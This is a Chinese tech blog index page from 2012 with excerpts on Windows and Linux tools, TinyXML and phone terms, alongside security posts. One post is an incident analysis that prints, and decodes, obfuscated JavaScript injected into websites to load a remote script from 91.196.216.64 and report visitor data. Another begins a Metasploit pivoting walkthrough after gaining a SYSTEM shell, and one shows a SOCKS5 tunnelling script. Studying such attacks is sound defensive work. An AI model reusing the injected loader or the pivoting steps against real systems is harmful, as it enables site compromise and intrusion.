ZeroBox Notes

PSCP使用手册

root — Thu, 10 May 2012 13:02:01 +0000

PSCP和SCP功能相同，在windows下使用，只有一个文件，建议将pscp.exe放到C:\WINDOWS\system32下面，这样就可以在任何地方调用了。语法与scp相同，下面是几个有用的options。 -p 拷贝文件的时候保留源文件建立的时间。 -q 执行文件拷贝时，不显示任何提示消息。 -r 拷贝整个目录 -v 拷贝文件时，显示提示信息。 Usage: pscp [options] [user@]host:source target pscp [options] source [source...] [user@]host pscp [options] -ls 用法： pscp [选项] [用户名@]主机：源文件目标文件 pscp [选项] 源文件 [源文件……] [用户名@]主机 pscp [选项] -ls 用户名@主机：文件空间？选项： -p …

继续阅读 »

pscp实现远程文件和文件夹传输

root — Thu, 10 May 2012 13:01:33 +0000

pscp与linux下的scp命令相似，功能相同，在windows下使用，只有一个文件，建议将pscp.exe放到C:\WINDOWS\system32下，这样可以在任何地方调用。一、用法： pscp [option] [user@]host:source target pscp [option] source [source…] [user@]host pscp [option] -ls user@host:filespace 二、option 几个常用的option： -p preserve file attrbutes 拷贝文件时保留源文件建立的时间 -q quiet,don’t show satatistics 执行文件拷贝时，不显示任何提示消息 -r copydirectories recursively 拷贝整个目录 -v show verbose messages拷贝文件时，显示提示信息 -V print version information and exit 其他option： -loadsessname Load settings from savedsession 加载保存session的设置 -P port connect to specified port 连接到指定端口 -I user connect with specified username 用指定的用户连接 …

继续阅读 »

linux du 命令

root — Thu, 10 May 2012 13:01:15 +0000

用途概述磁盘使用。语法 du [ -a | -s ] [ -k ] [ -m ] [ -g ][ -l ] [ -r ] [ -x ] [ -H | -L ][ File ... ] 描述 du命令显示用于文件的块的数量。如果指定的File参数实际上是一个目录，就要报告该目录内的所有文件。如果没有提供 File参数，du命令使用当前目录内的文件。如果File参数是一个目录，那么报告的块的数量就是分配到目录中文件以及分配到目录自身的块之和。指定-a标志，报告个体文件中块数量。不管是否使用了-a标志，由File参数指定的个体文件总是要列出。指定-s标志，报告用于所有指定文件和目录中所有文件的全部块。 …

继续阅读 »

Linux man命令的使用方法

root — Thu, 10 May 2012 13:00:34 +0000

Linux提供了丰富的帮助手册，当你需要查看某个命令的参数时不必到处上网查找，只要man一下即可。 Linux的man手册共有以下几个章节： 1 Executable programs or shell commands 2 System calls (functions provided by the kernel) 3 Library calls (functions within program libraries) 4 Special files (usually found in /dev) 5 File formats and conventions eg /etc/passwd 6 Games 7 …

继续阅读 »

linux 文件系统文件类型

root — Thu, 10 May 2012 13:00:04 +0000

Linux继承了Unix操作系统结构清晰的特点。在linux下的文件结构非常有条理。但是，上述的优点只有在对linux相当熟悉时，才能体会到。 / 　　根目录，所有的目录、文件、设备都在/之下，/就是Linux文件系统的组织者，也是最上级的领导者。 /bin 　　bin 就是二进制（binary）英文缩写。在一般的系统当中，你都可以在这个目录下找到linux常用的命令。系统所需要的那些命令位于此目录，比如 ls、cp、mkdir等命令；功能和/usr/bin类似，这个目录中的文件都是可执行的、普通用户都可以使用的命令。作为基础系统所需要的最基础的命令就是放在这里。 /boot 　　Linux的内核及引导系统程序所需要的文件目录，比如 vmlinuz initrd.img 文件都位于这个目录中。在一般情况下，GRUB或LILO系统引导管理器也位于这个目录。 /cdrom 　　这个目录在你刚刚安装系统的时候是空的。你可以将光驱文件系统挂在这个目录下。例如：mount /dev/cdrom /cdrom /dev 　　dev 是设备（device)的英文缩写。这个目录对所有的用户都十分重要。因为在这个目录中包含了所有linux系统中使用的外部设备。但是这里并不是放的外部设备的驱动程序。这一点和我们常用的windows,dos操作系统不一样。它实际上是一个访问这些外部设备的端口。我们可以非常方便地去访问这些外部设备，和访问一个文件，一个目录没有任何区别。 /etc 　　etc这个目录是linux系统中最重要的目录之一。在这个目录下存放了系统管理时要用到的各种配置文件和子目录。我们要用到的网络配置文件，文件系统，x系统配置文件，设备配置信息，设置用户信息等都在这个目录下。 /home 　　如果我们建立一个用户，用户名是”xx”,那么在/home目录下就有一个对应的/home/xx路径，用来存放用户的主目录。 /lib 　　lib是库（library）英文缩写。这个目录是用来存放系统动态连接共享库的。几乎所有的应用程序都会用到这个目录下的共享库。因此，千万不要轻易对这个目录进行什么操作，一旦发生问题，你的系统就不能工作了。 /lost+found 　　在ext2或ext3文件系统中，当系统意外崩溃或机器意外关机，而产生一些文件碎片放在这里。当系统启动的过程中fsck工具会检查这里，并修复已经损坏的文件系统。有时系统发生问题，有很多的文件被移到这个目录中，可能会用手工的方式来修复，或移到文件到原来的位置上。 /mnt 　　这个目录一般是用于存放挂载储存设备的挂载目录的，比如有cdrom 等目录。可以参看/etc/fstab的定义。有时我们可以把让系统开机自动挂载文件系统，把挂载点放在这里也是可以的。主要看/etc/fstab中怎么定义了；比如光驱可以挂载到/mnt/cdrom。 /media 　　有些linux的发行版使用这个目录来挂载那些usb接口的移动硬盘（包括U盘）、CD/DVD驱动器等等。 /opt 　　这里主要存放那些可选的程序。你想尝试最新的firefox测试版吗?那就装到/opt目录下吧，这样，当你尝试完，想删掉firefox的时候，你就可以直接删除它，而不影响系统其他任何设置。安装到/opt目录下的程序，它所有的数据、库文件等等都是放在同个目录下面。 /proc 　　可以在这个目录下获取系统信息。这些信息是在内存中，由系统自己产生的。操作系统运行时，进程信息及内核信息（比如cpu、硬盘分区、内存信息等）存放在这里。/proc目录伪装的文件系统proc的挂载目录，proc并不是真正的文件系统，它的定义可以参见 /etc/fstab /root 　　Linux超级权限用户root的家目录。 …

继续阅读 »

Linux as a Client to Windows SMB Shares

root — Tue, 24 Apr 2012 11:00:50 +0000

This article briefly explains how to access Windows SMB shares in Linux. Linux is a client here. If you want to read about using Linux as a Samba server to serve files to Windows clients, see Samba Quickstart. © 2005 …

继续阅读 »

各种猥琐隧道证明信任域、安全域划分很重要

root — Tue, 24 Apr 2012 10:59:22 +0000

分享一个Python 创建Socks5代理的代码: ==============================猥琐的分割线============================== #!/usr/bin/python # Filename s5.py # Python Dynamic Socks5 Proxy # Usage: python s5.py 1080 # Backgroup Run: nohup python s5.py 1080 & # Email: ringzero@557.im import socket, sys, select, SocketServer, struct, time class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass class …

继续阅读 »

Web应用漏洞的大规模攻击案例分析

root — Mon, 09 Apr 2012 03:30:43 +0000

来源：http://blog.knownsec.com/2012/03/web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%A4%A7%E8%A7%84%E6%A8%A1%E6%94%BB%E5%87%BB%E6%A1%88%E4%BE%8B%E5%88%86%E6%9E%90/ 当一个流行的Web应用漏洞碰到充满想象力的Web Hackers，会产生什么化学效应？ By GreySign@Yunnan:2012/3/20 我们常常听闻各种Web漏洞被发现、被利用、被大肆宣传，或许安全厂商们都多多少少有点让用户们觉得这只是恐吓营销的手段，但我们从不这么认为。从我们的团队创立至今，分析、深入追踪过的案例大大小小已经数不清，但我们也相信，这些被发现的精彩的大规模攻击、APT攻击（当最初我们看到各种高级攻击的时候，还不知道如何称呼它们）只是冰山一角，浮出水面的每个事件，在经过各位安全研究员的深入分析，都足以拍成一部电影。 Anonymous对全球白帽子下了3月31日瘫痪DNS根服务器的挑战书的时候，我相信在这个互联网上大隐于市的高手们经已蓄势待发，默默捍卫承载着无数梦想的国度。与此同时，我们也在贡献着力所能及的微薄力量，时刻响应来自客户、来自国家、来自互联网那些需要我们帮助的安全事件。在最近一段时间，我们发现了一个大规模攻击，与各位共享一下这个有意思的追踪过程。一段神秘的JS 最初的时候，我们发现客户的网站的js里都嵌入了一段加密后的脚本，虽然加密、压缩、代码混淆也时常是JS开发者压缩代码、保护代码的手段，不过仔细看看解密后的代码，往往会有一些精彩的故事在里面。用浏览器或其他工具看客户网站上的脚本（如：http://a.com/wp-includes/js/jquery/jquery.js?ver=1.6.1），在文件底部发现：此时，我顺便看了看其他存放在本站的脚本文件，也全部被感染，插入了一样的脚本，看上去这像是自动化的批量插入的代码，我对它进行了解密：解密前： var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ; 解密后整理一下代码，类似： element=document[getElementById](sc_co) if(!element){cls=screen[colorDepth] sw=screen[width] sh=screen[height] dc=document[charset] lc=document[location] refurl=escape(document[referrer]) ua=escape(navigator[userAgent]) var js=document[createElement](script) js[id]=sc_co js[src]=http://91.196.216.64/s.php?ref=+refurl+&cls=+cls+&sw=+sw+&sh=+sh+&dc=+dc+&lc=+lc+&ua=+ua var head=document[getElementsByTagName](head)[0] head[appendChild](js) } …

继续阅读 »

我看APT攻防对抗：APT攻击的特性

root — Fri, 30 Mar 2012 01:49:12 +0000

FlashSky 翰海源CEO 翰海源:立志于让安全成为IT系统基础属性;帮助客户改进自身系统的安全,以及实现对APT攻击的检测与防御. APT（高级持续性威胁）攻击是指近年来,专业甚至是有组织和国家背景支持的黑客,针对重要目标和系统发起的一种攻击手段，主要特征有 1）持续性：攻击者为了重要的目标长时间持续攻击直到攻破为止。攻击成功用上一年到三年，攻击成功后持续潜伏五年到十年的案例都有。这种持续性攻击下，让攻击完全处于动态发展之中，而当前我们的防护体系都是强调静态对抗能力很少有防护者有动态对抗能力，因此防护者或许能挡住一时的攻击，但随时间的发展，系统不断有新的漏洞被发现，防御体系也会存在一定的空窗期：比如设备升级、应用需要的兼容性测试环境等等，最终导致系统的失守。 2）终端性：攻击者虽然针对的是重要的资产目标，但是入手点却是终端为主。再重要的目标，也是由终端的人来访问的。而人在一个大型组织里，是难以保证所有人的安全能力与安全意识都处于一个很高水准之上的。而做好每个人的终端防护比服务器端防护要困难很多。通过SQL注射攻击了WEB服务器，一般也是希望利用他攻击使用这些WEB服务器的终端用户作为跳板渗透进内网。 3）广谱信息收集性：攻击者会花上很长的时间和资源，依靠互联网搜集，主动扫描，甚至真实物理访问方式，收集被攻击目标的信息，主要包括：组织架构，人际关系，常用软件，常用防御策略与产品，内部网络部署等信息。 4）针对性：攻击者会针对收集到的常用软件，常用防御策略与产品，内部网络部署等信息，搭建专门的环境，用于寻找有针对性安全漏洞，测试特定的木马是否能饶过检测。 5）未知性：攻击者依据找到的针对性安全漏洞，特别是0DAY，根据应用本身构造专门的触发攻击的代码。并编写符合自己攻击目标，但能饶过现有防护者检测体系的特种木马。这些0DAY漏洞和特种木马，都是防护者或防护体系所不知道的。 6）渗透性社工：攻击者为了让被攻击者目标更容易信任，往往会先从被攻击者目标容易信任的对象着手，比如攻击一个被攻击者目标的电脑小白好友或家人，或者被攻击者目标使用的内部论坛，通过他们的身份再对组织内的被攻击者目标发起0DAY攻击，成功率会高很多。再利用组织内的已被攻击成功的身份再去渗透攻击他的上级，逐步拿到对核心资产有访问权限的目标。 7）隐蔽合法性：攻击者访问到重要资产后，往往通过控制的客户端，分布使用合法加密的数据通道，将信息窃取出来，以饶过我们的审计和异常检测的防护。 8）长期潜伏与控制：攻击者长期控制重要目标获取的利益更大。一般都会长期潜伏下来，控制和窃取重要目标。当然也不排除在关键时候破坏型爆发。从以上特性来看，可以获得如下结论 1）APT攻击的成本很高（专业的团队，长期的信息收集，挖掘0DAY和利用，特马，环境测试，渗透性社工与潜伏，多种检测对抗），因此只适合专业的网络犯罪团伙或有组织和国家支持的特种攻击团队 2）因此APT攻击是针对有重要价值资产或重要战略意义的目标，一般军工、能源、金融、军事、政府、重要高科技企业等最容易遭受APT攻击。 3）虽然普通网民不会遭受APT攻击的眷顾，但是如果你是APT攻击目标组织的一名普通员工甚至只是与APT攻击目标组织的一名普通员工是好友或亲戚关系，你依然可能成为APT攻击的中间跳板，当然作为普通个人，APT攻击本身不会窃走你个人什么东西（你本身就是重要人物如组织中的高级管理人员或个人主机里保存有重要资料的除外）。 4）不要以为你重要的信息资产只在内网甚至物理隔离就能不遭受APT攻击，因为即使物理阻止了网络层流，也阻止不了逻辑上的信息流。RSA被APT攻击利用FLASH 0DAY偷走了在内网严密保护的SECURID令牌种子，震网利用7个0DAY和摆渡成功渗透进了伊朗核设施级的物理隔离网络。目前APT攻击发布细节出来的案例，基本都是以美国公布的。但是不代表APT攻击只针对欧美，主要原因在于，美国由于IT技术的发达成为APT攻击的首要目标，而且很多高科技公司也是民营的，而美国公司把针对安全事件发生后的调查和公布看作一种公司的诚信行为，而其他很多国家因为被攻击后更习惯捂盖子的做法公开的很少。另一个原因是我猜测，美国在APT检测和防御技术上具备一定的先进性使，他们具备针对部分APT攻击能及时发现，因此可以在攻击一开始时就配合取证了解完整的攻击过程与手法，而其他国家在这方面比较落后，发现时都是后期阶段，只能清除而很难分析取证溯源了解整个攻击过程与手法了。 …

继续阅读 »

metasploit的pivot实例详解

root — Sat, 24 Mar 2012 11:08:51 +0000

出处：http://hi.baidu.com/p3rlish/blog/item/d117a7f3a8b3384f352acc08.html first，不管怎么样，各种方式，首先获得一个shell，system权限的shell，建立meterpter的session meterpreter > getprivs ============================================================ Enabled Process Privileges ============================================================ SeDebugPrivilege SeIncreaseQuotaPrivilege SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege SeSystemProfilePrivilege SeSystemtimePrivilege SeProfileSingleProcessPrivilege SeIncreaseBasePriorityPrivilege SeCreatePagefilePrivilege SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege SeSystemEnvironmentPrivilege SeChangeNotifyPrivilege SeRemoteShutdownPrivilege SeUndockPrivilege SeManageVolumePrivilege meterpreter > getsystem …got system (via technique 1). 然后看下本地的ip神马的 meterpreter > ipconfig …

继续阅读 »

让安全成为IT系统的基础属性

root — Sat, 17 Mar 2012 01:58:44 +0000

作者:FlashSky 南京翰海源 CEO 随着IT技术的发展，信息化和网络化让IT系统已经成为各行各业不可或缺的部分，人们的日常生活与工作也越来越离不开IT系统。IT系统在带来极大的信息传播与共享能力、提高生产效率、丰富人们的业务生活外，也不可避免的带来安全问题，安全随人们的依赖程度提高而越严峻。针对IT系统的攻击逐步由技术炫耀向有组织犯罪甚至组织和国家之间半军事化对抗演变。在日常现实生活中，人们的人生与物理安全，很多时候是依赖于事后追查机制。通过事后追查，提高犯罪者法律风险来降低安全事件发生的概率，只有一些重要事件需要保护时才提供额外的事前安全保护机制；事后追查机制用较低的成本获得一个能被大众接受的安全度。但是IT系统特别是网络化之后，单纯的事后追查防范风险的机制已经很难有效针对IT系统，主要原因在于： 1）接触成本低：在现实犯罪中，罪犯想要实施犯罪，则必须物理接触被实施对象，因此其接触成本大大提高。而在网络系统中，任意在网络上连接的两点都可以实现虚拟接触，罪犯的接触成本大大降低。 2）取证困难：在现实犯罪中，物理接触必然会留下大量的物理证据和目击人证，取证更容易；而在网络犯罪中，都是电磁信号等非持续保留信号，即使可以持续保留的文件日志等信息也都可以被罪犯绕过或无痕删除，而且最后也只能指认锁定的IP和主机，无法确认实施人员。 3）地域受限：国家是由界限的，在现实犯罪中，罪犯实施犯罪必须接触被侵犯目标，在追查的一定时空域内，还属于一个国家的管辖权内，实施取证与执法都比较容易。而网络上，可以轻易跨越国界实施犯罪，导致取证和执法都相当困难。 4）侵害获知的实时性：在现实犯罪中，侵害的都是实体资产，一旦侵害发生，被害人可以及时获知然后通过报案启动事后追查体系。然而针对IT系统的犯罪，大部分侵害的是信息资产，用户很难及时获知被侵害已经发生。即使侵害的是实体资产，也可以通过信息欺骗滞后被发现的时间，典型的案例就是震网在2006年左右就已经入侵伊朗核设施后修改参数导致核设施生产不出可以制造核武器的物质，然而显示却一切正常，直到2010年才被发现。基于以上原因，采用现实生活中的事后追责处置的方式来应对IT系统的安全问题，是很难降低IT系统的安全风险。要求IT系统必须拥有更多主动的事前、事中与事后的防御与检测措施。于是各类IT系统安全防护与检测产品应运而生：防护墙、入侵检测、病毒检测等等，这些系统降低了IT系统的部分安全风险但也带来了很多其他的问题，但是始终难以从根源上缓解IT系统面临的安全威胁。究其原因：虽然数学已经证实了可以在两个不可靠的系统之上构建可靠的系统，但还无法证实在多个不安全或不可信的系统之上可以构建可信的系统。不可靠是物理客观而且可以清晰界定范围，可信则是主观范畴，安全虽然是物理客观但却属于未知范畴。要想让IT系统更加安全，还必须从IT系统自身的安全着手，让安全成为IT系统的基础属性。让安全成为IT系统的基础属性，实际上包含了如下的要求： 1） IT系统的自主开发的代码必须是达到一定安全度的：针对IT系统的代码安全漏洞发起攻击日益成为当前针对IT系统发起远程攻击的重要手段。相对来说：管理等问题带来的侵害基本都是接触式的攻击，而远程非接触式的侵害基本都需要配合IT系统的安全漏洞来发起。而安全开发的意识基本还未普遍形成，导致安全漏洞在IT系统中普遍大量存在。必须强化系统设计与开发人员的意识，采用一定的技术手段，来降低IT系统开发时引入大量的安全漏洞和其他各种安全瑕疵。 2）针对IT系统的外部来源组件必须有一定的安全监控和管理手段：IT系统是在一个开放式架构复杂组合而成，大多数IT系统必然需要采购或者本身就是建立在其他第三方的外部组件之上来构建的。针对这些第三方来源的组件，必须有一套准入、验收、保证、响应与追责的体系，来保证第三方来源的组件进入时初步的安全，安全问题产生时的快速响应与修复，对第三方来源的组件的安全问题追责和管理。 3） IT系统的外部防御体系：目前业界已经建立了一套IT系统的外部防御体系，但是在目前IT系统的安全风险与威胁之下，也遭受着各种各样的挑战，原因正在于： a) 检查滞后性：缺乏及时发现最新攻击和被入侵的能力。IDS/IPS依赖对漏洞和攻击代码的已知信息上，杀毒产品依赖于对病毒和木马的样本和具体行为信息上。难以针对0DAY和特马做出及时的响应。 b) 缺乏智能分析和关联能力：一般做法要么粗暴的阻断导致由于误报导致可用性大幅度降低，要么将非常专业的信息递交给无专业技能的用户做决断，用户既不能正确判断也非常烦恼频繁的提示导致的易用性损失，最后可能导致用户关闭相关安全功能。要想达到以上几个目标，最终让安全成为IT系统的基础属性，整个IT产业界和安全业界必须做出以下的努力： 1）树立安全意识：通过越来越多的安全事件，IT系统的安全的重要性开始被越来越多的人们所重视。但是如何来解决IT系统的安全问题，很多人都抱有简单的幻想，希望用一个简单的改善就能获取安全；必须认识到安全是一个非常复杂的体系，需要全方面的投入和改善，每一个安全的措施只能提高一点攻击者的成本或降低特定情况的风险而不能大幅度改善安全境况。用户信息泄密事件之后，很多厂商号称自己换用了MD5加密存储用户的密码手段，因此是安全的就非常可笑。问题在于攻击者是通过安全漏洞获得用户敏感信息的，解决方案并没有解决自身的安全漏洞问题，只是让攻击者拿到的是MD5加密的信息，攻击者通过彩虹表就已经能查询出大部分强度不够的密码，攻击者甚至可以入侵服务器修改代码，让用户密码在做MD5运算之前就传递给攻击者等等。当然有了改善总比没有改善要好，至少攻击者需要做出更多额外的工作增加了攻击成本。所以针对有重要信息资产的系统，安全投入会不断增高，很多企业不愿意在安全上做投入，认为安全只是成本没有正向收益，但是企业需要想一想，如果没有安全来保障IT系统的运营，引入IT系统带来的效益或者依赖IT系统带来的效益，就只是空中楼阁，在罪犯和竞争对手攻击之下飞灰湮灭。以安全为看点可能为你争取到更大的蛋糕，但即使安全不能为你增加什么，但没有安全你就无法守住你已经获得的蛋糕。当然，安全也必须在可能的损失、成本、用户体验、系统可用性等各种竞争性需求之下寻求一个平衡，但安全必须成为一个重要的考虑因素。 2）改善学校的计算机教育体系：在我们传统的开发能力教育中，强调性能和用户友善性为主，但是缺乏安全的部分。未来的程序员从学校中学习不到安全，了解不到安全的重要性，掌握不了安全问题的机制和编码的相关性，自然编写出来的代码千疮百孔，漏洞遍地。在我们传统的软件工程教育中，对软件安全设计的原则缺乏描述，对关键的软件安全开发管理过程也缺乏讲解。自然难以在未来软件设计和软件工程管理中，将安全作为一个考量的重要因素。 3）用安全开发过程（SDL）来保障代码安全：微软从2003年开始认识到必须改进自身开发产品的安全性必须从开发过程着手，之后引入了安全开发过程（SDL），WIN7、OFFICE2010、IE8等产品都是在SDL过程下开发出来的。这些产品虽然未能完全解决安全漏洞，但是相对于以前的系统，安全性得以大幅度的提高，在安全业界也获得了好评。微软的实践证实：即使是在超大型软件开发背景下，通过安全开发过程的管控，结合安全能力与安全意识的培育，是可能在开发级上就非常有效的提升IT系统的安全性的。当然采用SDL意味着需要付出很大的成本，而且对既有的开发模式、人员冲击都比较大。可以通过采用循序渐进的方式，但是基础的人员安全能力与意识的培训、系统上线前的安全测试、漏洞及时响应修复与公告等措施还是必须具备的。 4）建立供应链安全管理体系：供应链安全最近越来越被注重，但如何控制好供应链的安全还需要各种各样的管理规范和技术体系支撑，但至少，要求供应商承诺实施安全开发过程、对安全漏洞实施响应承诺是必须的，在此基础上，还需要对供应商交付的组件特别是非大众公共的组件实施必要的安全验收和安全监理，依据供应商自身组件安全问题和响应评估供应商的安全能力和安全性，顶起淘汰不合格的供应商。才能有效地在供应链源头控制安全风险。 5）外部防御体系需要不断依据攻防发展作出技术变革：针对现有防护体系的不足，业界已经在反思，从技术到策略都在作出调整。下一代防护墙（NGFW），下一代入侵检测系统（NGIDS）都提出了应对IT安全问题的新的方向，他们都在综合安全事件智能分析、对未知安全漏洞攻击的检测、对未知入侵事件的及时感知等能力上有所加强。配合这些外部防御体系，可以更有效地对IT系统当前的安全状态进行感知和发现基于未知漏洞的攻击。 6）实现防护方共享攻击信息机制：安全本身是一种状态，当用比较低的成本垒高攻击者攻击成本导致攻击者收益小于攻击者成本时可以获得最高的安全性。从防护者角度，要每个IT系统都单独且面面俱到发现IT系统的所有未知安全问题并及时分析响应作出对抗策略需要付出太高的成本而且高端安全人力资源也极为短缺，如果防御方能共享攻击信息，共享专业安全攻防团队的分析和响应支持，可以大大降低所有IT系统防护未知安全问题和攻防对抗的成本，针对黑客最新的攻击手法和安全漏洞作出快速响应，以较小的代价变相推高攻击者成本来实现IT系统的安全性。无论如何，二十一世纪是信息网络时代的世纪，在这个世纪，架构在互联网之上的各种IT系统将更加深刻的勾画人类的未来，无论移动互联、物联网、云计算，安全会成为这些IT系统面临的最迫切需要改进的问题。努力实现让安全成为IT系统的基础属性，或许会付出很高昂的代价，但是相对未来可能因安全问题引起的损失，是我们必须要面对和付出的努力。

TinyXml 中文文档

root — Sat, 17 Mar 2012 01:57:54 +0000

译注：本文是TinyXML 2.5.2版本Document的中文文档，经原作者Lee Thomason同意由hansen翻译，如有误译或者错漏，欢迎指正。版权：版权归原作者所有，翻译文档版权归本人hansen所有，转载请注明出处。原文：http://www.grinninglizard.com/tinyxmldocs/index.html TinyXml 文档 2.5.2 TinyXML TinyXML是一个简单小巧，可以很容易集成到其它程序中的C++ XML解析器。它能做些什么简单地说，TinyXML解析一个XML文档并由此生成一个可读可修改可保存的文档对象模型（DOM）。 XML的意思是“可扩展标记语言“（eXtensible Markup Language）。它允许你创建你自己的文档标记。在为浏览器标记文档方面HTML做得很好，然而XML允许你定义任何文档标记，比如可以为一个组织者应用程序定义一个描述“to do”列表的文档。 XML拥有一个结构化并且方便的格式，所有为存储应用程序数据而创建的随机文件格式都可以用XML代替，而这一切只需要一个解析器。最全面正确的说明可以在http://www.w3.org/TR/2004/REC-xml-20040204/找到，但坦白地说，它很晦涩难懂。事实上我喜欢http://skew.org/xml/tutorial/上关于XML的介绍。有不同的方法可以访问和与XML数据进行交互。TinyXML使用文档对象模型（DOM），这意味着XML数据被解析成一个可被浏览和操作的C++对象，然后它可以被写到磁盘或者另一个输出流中。你也可以把C++对象构造成一个XML文档然后把它写到磁盘或者另一个输出流中。 TinyXML被设计得容易快速上手。它只有两个头文件和四个cpp文件。只需要把它们简单地加到你的项目中就行了。有一个例子文件——xmltest.cpp来引导你该怎么做。 TinyXML以Zlib许可来发布，所以你可以在开源或者商业软件中使用它。许可证更具体的描述在每个源代码文件的顶部可以找到。 TinyXML在保证正确和恰当的XML输出的基础上尝试成为一个灵活的解析器。TinyXML可以在任何合理的C++适用系统上编译。它不依赖于异常或者运行时类型信息，有没有STL支持都可以编译。TinyXML完全支持UTF-8编码和前64k个字符实体（<i>译注：如果你不明白这句译文，可能你需要了解一下Unicode编码</i>）。它无法做些什么 TinyXML不解析不使用DTDs（文档类型定义）或者XSLs（可扩展样式表语言）。有其它解析器（到www.sourceforge.org搜索一下XML）具有更加全面的特性，但它们也就更大，需要花更长的时间来建立你的项目，有更陡的学习曲线，而且经常有一个更严格的许可协议。如果你是用于浏览器或者有更复杂的XML需要，那么TinyXML不适合你。下面的DTD语法在TinyXML里是不做解析的： <!DOCTYPE Archiv [ <!ELEMENT Comment (#PCDATA)> ]> 因为TinyXML把它看成是一个带着非法嵌入!ELEMENT结点的!DOCTYPE结点。或许这在将来会得到支持。指南有耐性些，这是一份能很好地指导你怎么开始的指南，它（非常短小精悍）值得你花时间完整地读上一遍。 TinyXML指南代码状况 …

继续阅读 »

手机名词解释

root — Mon, 27 Feb 2012 09:02:44 +0000

来源：http://bbs.anzhi.com/forum.php?mod=viewthread&tid=4907641 一、基本概念： hboot分区———-负责启动。 radio分区———-负责驱动。 recovery分区——-负责恢复。 boot分区———–系统内核。 system分区———系统文件。 cache分区———-系统缓存。 userdata分区——-用户数据。二、名词详解： 1、hboot（SPL）：这里指的是手机上的启动模块，通俗的说，就是负责手机启动引导的一段程序，类似于电脑主板上的BIOS，都是负责底层操作的。和在电脑　上刷新BIOS一样，刷错了，电脑就会开不了机，对手机来说也一样，这部分的内容刷错了，手机就会变砖！ 2、radio：这里指的是手机上的通讯模块，又叫做基带。负责手机的无线信号，蓝牙，WIFI等设备的管理，也就是说，相当于电脑系统里面的硬件驱动部分。这　样说或许也不是特别的准确，大家明白大概的意思就可以了。通常我们所说的刷radio，刷基带，就是指的刷写这一部分，以便解决通话质量、网络连接质量、　蓝牙连接等等问题。 3、recovery：字面意思是恢复，手机上的一个功能分区，有点类似于笔记本电脑上的恢复分区。一般大厂出的笔记本，都会自带一个特殊分区，里面保存着系　统的镜像文件，当系统出问题的时候，我们可以通过它来一键恢复系统。这里的recovery功能有些类似。其实，他更像是电脑上的小型winPE系统，可以允许　　我们通过启动到winPE系统上，去做一些备份、恢复的工作。当然，系统自带的recovery基本没用，所以我们通常会刷入一个第三方的recovery，以便实现更　　多的功能，例如：备份系统，恢复系统，刷新系统等。但官方自带的recovery也不是一无是处，在使用OTA方式升级系统时候，会检查此分区内容，如果不是　　原厂自带的，OTA升级就会失败。 4、fastboot：字面意思是快速启动，在这里，其实是一个特殊的工程模式，通过fastboot界面，连接电脑后，我们可以在电脑端通过特殊的指令来操作手机，　　例如更新radio，就可以通过fastboot来完成。fastboot的级别又要比recovery来的要高一些，可以完成更底层的一些操作。 5、ADB：android debug bridge，字面意思就是安卓调试桥接，简单点说，它是android系统提供的一套工具，通过它，我们可以在电脑上建立一个连接到手机　　的通道，然后可以在电脑上向手机发送一些指令，完成一些我们需要做的工作。 6、ROM：read only memory,只读存储器。上面我们讲过的，android系统都是安装在闪存里面的，这个闪存，就是一种只读存储器，断电情况下里面的内容不　　会消失。刷机，就是刷的ROM。有点类似电脑里的硬盘，ROM里面有很多分区，hboot、boot、system等等。 7、OTA：Over The Air，意思是空中升级，当手机系统有更新出现的时候，通常我们会收到官方发送的一条信息，告诉我们，手机系统有更新了，是否需要下　　载。其优点是点对面，属于广播的形式，有需求的时候可以自由下载。 8、CID：Customer IDentity的简称，即客户身份。销往不同地区的手机，会有不同的CID，例如：香港的CID为622，台湾的为621，大陆的为701，等等。　　　　　这个信息，我们可以在hboot界面下(必须是S-OFF)，进入SYSTEM INFO选项来查看，类似于：CID_622这样的字段。正常状态下的CID，有两个限制，一个是不　　允许交叉升级，意思是，你是港版的CID，那么你只能选择官方港版的升级包进行升级，你选择欧版的官方升级包，是无法升级的。第二个是不允许降级，即　　从高版本降低到低版本，也是不被允许的。 9、SuperCID：即超级用户身份，通过一些手段破解，我们可以让手机的CID变成SuperCID，破解后，CID字段变为：CID_11111111，这样我们就可以跳过官方的　　验证机制，从而可以刷不同版本的官方包，或者是给系统降级。 10、金卡：很多朋友不明白什么是金卡，这里的卡，是指的你手机里面的TF卡，普通的卡经过特殊的处理，就会变身为金卡，做好的金卡，和平时的TF卡一样来　　